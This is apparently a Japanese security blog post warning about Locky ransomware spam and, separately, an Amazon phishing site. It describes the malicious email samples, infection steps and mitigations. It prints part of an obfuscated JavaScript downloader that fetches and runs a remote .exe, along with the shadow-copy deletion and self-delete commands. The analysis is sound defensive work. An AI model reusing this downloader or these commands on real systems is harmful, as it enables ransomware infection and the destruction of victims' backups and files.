    日時 Date: Mon, 21 Mar 2016 10:01:42 -0700 (US,カナダ, メキシコ)
    X-Mailer KONICA MINOLTA
    本文 なし
    添付ファイル SKFBT_C0125690141.zip

    • Document 2

    件名 Document 2
    差出人 自分のメールアドレス
    日時 Tue, 22 Mar 2016 16:40:13 +0530 (IST India Standard Time インド)
    X-Mailer iPhone Mail (13B143)
    本文 なし
    添付ファイル Document 2.zip (中身は FAM6542645213.js)

    • Document 2

      
    件名 Document 2
    差出人 自分のメールアドレス
    日時 Tue, 22 Mar 2016 16:45:47 +0530 (IST India Standard Time インド)
    X-Mailer iPhone Mail (13B143)
    本文 なし
    添付ファイル Document 2.zip (中身は QVR3975568919.js)

    • Document 2

    件名 Document 2
    差出人 自分のメールアドレス
    日時 Tue, 22 Mar 2016 13:21:42 +0700 (ロシア?)
    X-Mailer iPhone Mail
    本文 なし
    添付ファイル Document 2.zip

    • Locky をダウンロードする Javascript の例(一部)

    LUH5654603905.js (一部)

    LnOKenpxqU = "If the nodes are siblings, we can do a quick check} else if ( aup === bup ) {return siblingCheck( a, b );";
    String.prototype.harmonize = function () { return this.substr(0, 1); };
    var zooFq = [("through","sesame","admissions","holes","T")+("scripts","beautify","attacked","arrangements","OQ")+("algeria","cucumber","relation","NF")+"JjAV"+"sY", "c"+("sponsorship","endorsed","finish","JbVL")+"Lh"+"xN", "Expan"+"dE"+"nviron"+"me"+"ntStri"+("stork","sluggish","foxes","ngs"), ""+"%"+("prominent","queens","foregone","susanna","TE")+"MP%", "/BhyIDtNVwP" + ""+"."+("revolve","meyer","shift","reborn","exe"), "R"+("medline","demur","arbitrator","un"), ("tumbler","dense","A")+("craig","repine","tramadol","ct")+"iv"+"eX" + ("compression","brewery","guitar","")+"O"+"bj"+"ect", "QGGOKcpS", "QwMELac", "W"+"Sc"+"ri"+("foxes","torture","pt.") + ("problem","inscribe","melissa","octave","S"), "DKiwgen", ""+("withering","andrew","shorter","h")+"ell", "pVfOLaUink", ("throttle","cowboy","")+("amalgamation","breast","u")+"gb"+"IRD", ""+("guarantee","breastplate","interpreted","M")+"SX"+"ML2" + "."+"XM"+"LH"+("freeze","pounce","immensity","taciturnity","TTP")];
    WeuTVCqwr = "Otherwise nodes in our document sort firstap[i] === preferredDoc ? -1 :bp[i] === preferredDoc ? 1 :0;};";   
    zooFq.splice(7,2);   
    var CTMoXJF = this[zooFq[7 * 8 - 50]];   
    HWKBtgugje = "QADrAWHk";   
    midnight = (("deleterious", "greenish", "bpRCgjnvY", "astuteness", "pxoHjzpzAa") + "FCIzdg").harmonize()   
    publicitys = (("compared", "cheaper", "QBuFHmOIr", "architects", "shvjRYg") + "FjirdbbvG").harmonize()   
    zooFq[7] = zooFq[7] + zooFq[9];   
    zooFq[8] = "WyGszYG";   
    zooFq.splice(8,3);   
    var SjBMgLMBX = new CTMoXJF(zooFq[7]);   
    SEVPbSzi = "}Walk down the tree looking for a discrepancywhile ( ap[i] === bp[i] ) {i++;";   
    var ivPMRM = new CTMoXJF(zooFq[9]);   
    rfQhFwb = "}Otherwise we need full lists of their ancestors for comparisoncur = a;while ( (cur = cur.parentNode) ) {ap.unshift( cur );}cur = b;while ( (cur = cur.parentNode) ) {bp.unshift( cur );";   
    var giLwRPLp = SjBMgLMBX[zooFq[2]](zooFq[3]) + zooFq[4];   
    SWlMAsjacQk = "}return i ?Do a sibling check if the nodes have a common ancestorsiblingCheck( ap[i], bp[i] ) :";   
    ivPMRM.onreadystatechange = function () {   
    if (ivPMRM[("animal","ferment","wince","r")+"ea"+("drummer","delicious","romany","thinking","dy")+"st"+("contributor","society","projects","oxygen","ate")] === 4) {   
       var aLcJyART = new CTMoXJF(""+"A"+("outlawed","mined","national","DO")+("derek","elizabethan","cleave","whisk","DB.")+("protuberance","stayed","proverbs","")+("terminus","dunno","madness","graphic","S")+"tr"+"eam");   
       aLcJyART.open();   
       KHvCvfBJOh = " return document; };";  

    try {

    LNqWai= "IE 9\"s matchesSelector returns false on disconnected nodesif ( ret || support.disconnectedMatch ||  As well, disconnected nodes are said to be in a document  fragment in IE 9 elem.document && elem.document.nodeType !== 11 ) {return ret;}} catch (e) {}";   
    ivPMRM.open(("symptom","sigma","colin","G")+"ET", "h"+("propagate","thrown","johnny","ttp:")+"//"+("mohawk","impair","chinhu")+"an"+"oi"+"that.c"+"om/s"+"ys"+"te"+"m/logs/u"+"y78hn6"+("hogshead","action","54")+"e.exe", false);BxpYFBq = "} return Sizzle( expr, document, null, [ elem ] ).length > 0; };";   
    ivPMRM[publicitys + ("illogical","quick-witted","grape","xerox","e") + (("promote", "moderately", "gnuUtaRFBS", "viscid", "impure", "nYAgsnHqfY") + "DudCuStvIn").harmonize() + (("miner", "squeal", "IKcQRgYhT", "blame", "concord", "dNdviLv") + "crpvqd").harmonize()]();   
    RqrXhxjRF = "Sizzle.contains = function( context, elem ) {Set document vars if neededif ( ( context.ownerDocument || context ) !== document ) {setDocument( context );}return contains( context, elem ); };";   
    SjBMgLMBX[zooFq[5]](giLwRPLp, 1, "qPdBvBqXfEO" === "HtIxotr"); xcwJYtK = " return val !== undefined ?val :support.attributes || !documentIsHTML ?elem.getAttribute( name ) :(val = elem.getAttributeNode(name)) && val.specified ?val.value :null; };";   
    lrGyXANbYvX = "Sizzle.attr = function( elem, name ) {Set document vars if neededif ( ( elem.ownerDocument || elem ) !== document ) {setDocument( elem );";   
    } catch (RaRfcWCIw) { };   
    xyQVrCFOYxk = "} var fn = Expr.attrHandle[ name.toLowerCase() ],Don\"t get fooled by Object.prototype properties (jQuery #13807)val = fn && hasOwn.call( Expr.attrHandle, name.toLowerCase() ) ?fn( elem, name, !documentIsHTML ) :undefined;";

    5. Locky ウイルスのダウロードURL

    メールに添付された zip ファイルに含まれる js ファイルを実行すると HTTP アクセスして、Locky Virus をダウンロード実行します。HTTPアクセス先 URL の一例です。

    hxxp://timefusewatches.com/system/logs/3523523.exe
    hxxp://palat.com/system/logs/98h7b66gb.exe
    hxxp://palahasit.com/system/logs/98h7b66gb.exe

    /system/logs/*.exe となっているURLが多いようです。

    6. Locky ウイルス感染時の動作

    メール経由(js を含む添付ファイル)での感染時の動作です。感染してファイルを暗号化された後は、Locky Virus は自身を削除してしまうため残っていません。このため、暗号化された後に、アンチウイルスソフトウェアでフルスキャンしても見つかりません。メール添付されていた zip or Javascript は残っているので、これらが検知されることはあるかもしれません。

    1. Locky Virus をダウンロードするための Javascript を圧縮した zip ファイルを添付したメールが届く
    2. 添付された zip を開いて Javascript ファイル( 例: LUH5654603905.js)を実行すると、Locky Virus である実行ファイルがダウンロード実行される
    3. Volume Shadow Copy サービスで自動バックアップされているファイルをコマンドで削除する「C:\Windows\System32\wbem\WMIC.exeshadowcopydelete/nointeractive」
    4. Locky C2 (コントロール&コマンド)サーバに通信して暗号化に関する情報をやり取り (hxxp://xxxxxxx/main.php、hxxp://xxxxxxx/gate.php へのPOST通信が多い)
    5. ファイルの暗号化処理
    6. 脅迫文を作成して表示
    7. Locky Virus の実行ファイルを削除 「"C:\Windows\system32\cmd.exe" /c DEL %USERPROFILE%\DOCUME~1\TWRPUI~1.EXE」
               

    7. 感染しないための対策

    • Adobe Flash Player を最新バージョンにアップデートする
    • Adobe Reader を最新バージョンにアップデートする
    • Java を最新バージョンにアップデートする
    • Internet Explorer を最新バージョンにアップデートする
    • Windows Update のセキュリティパッチをすべて適用する
    • アンチウイルスソフトの最新パターンにアップデートし、リアルタイム検知を有効にする
    • 問題なければ .js 拡張子の関連付けを、Javascript が実行できないプログラム(例えばnotepad.exe など)に変更する
    • js, wsf, vbs などの関連付けを無効にする
    • js, wsf, vbs などに関連付けられた WScript.exe をグループポリシーや権限などで実行禁止する
    • Microsoft Office のマクロ設定を警告表示もしくは無効にする

    各種ソフトウェアやプラグインが最新バージョンになっているかは、情報処理推進機構 IPA が提供している MyJVN パージョンチェッカー(http://jvndb.jvn.jp/apis/myjvn/vccheck.html)で確認できます。

    8. 関連リンク

    Amazonをかたるフィッシングサイト

    Amazonをかたるフィッシングサイト



    概要

    2016年2月1日、フィッシング詐欺に関する情報収集、提供、注意喚起を行っているフィッシング対策協議会が、Amazon をかたるフィッシングサイトが見つかったとして注意喚起を行いました。今回見つかったAmazonのフィッシングサイトは、co.jp や com と誤認しやすいコロンビアのドメイン .co が使わており注意が必要です。

    https://www.antiphishing.jp/news/alert/amazon_20160201.html

    フィッシングサイトのURL

    確認されているAmazon をかたるフィッシングサイトのURL

    • hxxp://www.amazomjp.co/

    • hxxp://www.amazomjp.co/5627b9e0831c786cac9a2af3840af71a/sign_in.php

    フィッシングサイトの識別方法

    Amazonがフィッシングサイトを見分けるための情報を公開しています。注文履歴を確認する方法やAmazon.co.jp が発信するEメールのEアドレスドメインなどの情報があります。

    Amazon.co.jp からのEメールかどうかの識別について https://www.amazon.co.jp/gp/help/customer/display.html?nodeId=201304810

    Amazon.co.jp が利用している正しいドメイン一覧です。これ以外のドメインから来たメールやWebページはフィッシングサイトと判断して注意する必要があります。

    • amazon.co.jp
    • amazon.jp
    • amazon.com
    • marketplace.amazon.co.jp
    • m.marketplace.amazon.co.jp
    • gc.email.amazon.co.jp
    • gc.amazon.co.jp
    • payments.amazon.co.jp

     


    関連リンク

    フィッシングサイトのコンテンツは正規サイトのコピーを使っているので見分けがつきません。ちゃんとSSL証明書で確認しましょう。

    より以前の記事一覧

    記事一覧

    スポンサードリンク


    Twitter


    無料ブログはココログ

    ブログ検索